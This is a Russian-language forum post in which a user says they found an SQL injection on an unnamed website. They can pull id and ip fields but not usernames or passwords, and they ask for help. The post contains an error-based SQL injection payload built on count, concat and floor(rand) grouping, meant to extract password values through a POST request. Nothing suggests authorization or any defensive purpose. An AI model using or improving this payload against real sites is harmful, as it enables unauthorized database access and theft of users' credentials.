11.12.2013, 01:00
|
|
Познающий
Регистрация: 21.05.2011
Сообщений: 75
С нами:
7883606
Репутация:
0
|
|
Нашел SQL injection на одном сайте, не буду описывать на каком. В общем проблема в том что выгружает судя по всему только int-овые поля, id и ip, но username/password не хочет.
Внедряю через пост запрос:
source:
Код:
and
(
select
1
from
(
select
count
(
*
),concat((
SELECT
password
FROM
datbase LIMIT
0
,
1
),
0x3a
,
floor
(rand(
0
)
*
2
))x
from
information_schema.tables
group
by
x)a)
and
Что подскажете? |
|
|